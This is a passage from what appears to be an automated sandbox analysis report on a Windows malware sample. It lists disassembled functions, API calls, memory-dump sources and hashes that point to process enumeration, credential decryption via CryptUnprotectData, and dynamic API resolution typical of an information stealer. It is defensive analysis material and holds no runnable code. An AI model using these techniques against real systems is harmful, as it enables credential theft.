                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1c5609bdcb45373de83fa625fcefc407bd4f6fd6ac007dfdf391f746e936118
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB219E71A00218EBDB10DF95CC45BEEB7BCBB88B14F00416EF506A3681DB785A448BA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00411A90 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411AC9
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00411AD9
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00411AEB
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,?), ref: 00411B00
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00411B22
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                    • Opcode ID: 6bfa83b7f6e989be0c498737d3fd783ed556e19ea4810874aa2a2e2581b7072a
                                                                                                                                                                                                                                                    • Instruction ID: 3bf04baff1a06fc11e7b1362ae4d2554691e105fc7a6c6c7b9155b0ea0fdc4a1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bfa83b7f6e989be0c498737d3fd783ed556e19ea4810874aa2a2e2581b7072a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6811C176A01518AFC711CF89DC45BDEFBB9FB85750F10429AF905D3250D7386A40CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410299 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102B6
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041035A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                    • API String ID: 3280604673-4001269591
                                                                                                                                                                                                                                                    • Opcode ID: aa7b551a4450fbb3b040ac4758798ec177837fe01c6f56a92367faea59b6437e
                                                                                                                                                                                                                                                    • Instruction ID: cb8e8ad2f568fe281f73f0cdcfedcf4a159287a7ad31071e14a5e0c0d5f45da6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa7b551a4450fbb3b040ac4758798ec177837fe01c6f56a92367faea59b6437e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE113371A04119DBCB14DBD4D885BFEB7B9BF44700F54006EE606B3582D7785A84CB65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00406EB0 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406ED5
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?), ref: 00406EED
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00406F0E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2068576380-0
                                                                                                                                                                                                                                                    • Opcode ID: 7e17486665e56937d182edbad01d8a560438850606578b778efad3f39637f50e
                                                                                                                                                                                                                                                    • Instruction ID: ed9366d64e404a22696d742597e0eb9e1eb52c78cc5253b2f527fc45d1d98b44
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e17486665e56937d182edbad01d8a560438850606578b778efad3f39637f50e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE01DE79600319ABEB10DFA8DC55FAA77B9EB88700F104559FB45AB380D675E9008BA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004100D0 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004180F2,004271B6), ref: 004100DC
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,004180F2,004271B6), ref: 004100E3
                                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,004271B6), ref: 004100F7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1206570057-0
                                                                                                                                                                                                                                                    • Opcode ID: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                                    • Instruction ID: 19b93291ffa213a11ad41bdc802fd7864df3898d1af9124162a70396b117772a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88D012B9551228BBE7009BD49D0DFDA7B6DDB06751F001192FB05D3240D5F0590047E1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004103F0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2452939696-0
                                                                                                                                                                                                                                                    • Opcode ID: ef5c536bf4511d1fc8555fe4fa8161474e40b389619cca3d7e11b8caff3747a8
                                                                                                                                                                                                                                                    • Instruction ID: de5202d25358e933d58d178cf98dd0e4fc68860c0803fe1746855763c5f285eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef5c536bf4511d1fc8555fe4fa8161474e40b389619cca3d7e11b8caff3747a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD012B990011CDBC710DB90EC85AAAB77DAB48600F404695EF15E2140E6756A1D8AE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00418510 Relevance: 207.2, APIs: 114, Strings: 4, Instructions: 691libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2CC0), ref: 00418525
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2CE0), ref: 0041853D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CD960), ref: 00418556
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CD9F0), ref: 0041856E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDA50), ref: 00418586
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CD8D0), ref: 0041859F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C3EE0), ref: 004185B7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CD948), ref: 004185CF
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CD9A8), ref: 004185E8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CD9D8), ref: 00418600
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDAB0), ref: 00418618
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2B20), ref: 00418631
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2640), ref: 00418649
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2680), ref: 00418661
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2940), ref: 0041867A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDA80), ref: 00418692
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CD888), ref: 004186AA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C3FD0), ref: 004186C3
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C28A0), ref: 004186DB
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CD8A0), ref: 004186F3
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDA68), ref: 0041870C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDA98), ref: 00418724
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDBE8), ref: 0041873C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2720), ref: 00418755
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDC00), ref: 0041876D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDBA0), ref: 00418785
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDC18), ref: 0041879E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDBD0), ref: 004187B6
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDB88), ref: 004187CE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDC48), ref: 004187E7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDBB8), ref: 004187FF
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CDC30), ref: 00418817
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015D1378), ref: 00418830
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015CF1D0), ref: 00418848
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015D1210), ref: 00418860
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015D13A8), ref: 00418879
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C28C0), ref: 00418891
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015D12A0), ref: 004188A9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C26C0), ref: 004188C2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015D13C0), ref: 004188DA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015D1420), ref: 004188F2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2740), ref: 0041890B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74DD0000,015C2840), ref: 00418923
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D1438,004179D3,?,00000040,00000064,00414000,004135A0,?,0000002C,00000064,00413F50,00413FA0,?,00000024,00000064,00413EA0), ref: 00418935
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D12D0), ref: 00418946
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D1450), ref: 00418958
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D1390), ref: 0041896A
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D12B8), ref: 0041897B
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D1468), ref: 0041898D
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D1288), ref: 0041899F
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(015D13D8), ref: 004189B0
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 004189C0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75290000,015C2800), ref: 004189DC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75290000,015D1270), ref: 004189F4
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75290000,015CF870), ref: 00418A0D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75290000,015D12E8), ref: 00418A25
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75290000,015C2760), ref: 00418A3D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(734C0000,015C4070), ref: 00418A5D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(734C0000,015C25A0), ref: 00418A75
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(734C0000,015C3FF8), ref: 00418A8E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(734C0000,015D1240), ref: 00418AA6
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(734C0000,015D1228), ref: 00418ABE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(734C0000,015C26E0), ref: 00418AD7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(734C0000,015C27A0), ref: 00418AEF
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(734C0000,015D1300), ref: 00418B07
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(752C0000,015C27C0), ref: 00418B23
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(752C0000,015C2980), ref: 00418B3B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(752C0000,015D1318), ref: 00418B54
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(752C0000,015D1258), ref: 00418B6C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(752C0000,015C2780), ref: 00418B84
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C4098), ref: 00418BA4
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C41D8), ref: 00418BBC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015D13F0), ref: 00418BD5
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C2600), ref: 00418BED
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C2860), ref: 00418C05
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C3D50), ref: 00418C1E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1330), ref: 00418C3E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015C2920), ref: 00418C56
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015CF8B0), ref: 00418C6F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1348), ref: 00418C87
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1360), ref: 00418C9F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015C28E0), ref: 00418CB8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015C2660), ref: 00418CD0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1408), ref: 00418CE8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1480), ref: 00418D01
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015C2960), ref: 00418D1D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015D1498), ref: 00418D35
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015D14C8), ref: 00418D4E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015D14B0), ref: 00418D66
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015D11E0), ref: 00418D7E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75450000,015C2820), ref: 00418D9A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75450000,015C25C0), ref: 00418DB2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75DA0000,015C2700), ref: 00418DCE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75DA0000,015D11F8), ref: 00418DE6
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C27E0), ref: 00418E06
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C2900), ref: 00418E1E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C2620), ref: 00418E37
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015D14F8), ref: 00418E4F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C2880), ref: 00418E67
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C25E0), ref: 00418E80
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C26A0), ref: 00418E98
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015D16C8), ref: 00418EB0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00418EC7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 00418EDE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75AF0000,015D15A0), ref: 00418EFA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75AF0000,015CF850), ref: 00418F12
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75AF0000,015D1570), ref: 00418F2B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75AF0000,015D1558), ref: 00418F43
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75D90000,015D1868), ref: 00418F5F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6E3A0000,015D1588), ref: 00418F7B
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6E3A0000,015D1928), ref: 00418F93
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6E3A0000,015D1510), ref: 00418FAC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6E3A0000,015D1528), ref: 00418FC4
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6CA80000,SymMatchString), ref: 00418FDE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                                                                    • API String ID: 2238633743-951535364
                                                                                                                                                                                                                                                    • Opcode ID: 953c69991870206c77da6e2faa755a67d13f47f573c48f6a2580bfbba979c913
                                                                                                                                                                                                                                                    • Instruction ID: f9cf58ac8806fb8c29bb01b18208c616fc0e040653f854addec4e11ecea806dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 953c69991870206c77da6e2faa755a67d13f47f573c48f6a2580bfbba979c913
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D6201BDA10620EFE754DFA5ED98E2637BBF74AB017106529EA05C3364E734A841CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040C2D0 Relevance: 87.9, APIs: 36, Strings: 14, Instructions: 370registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C30B
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C32A
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C342
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C35A
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C36D
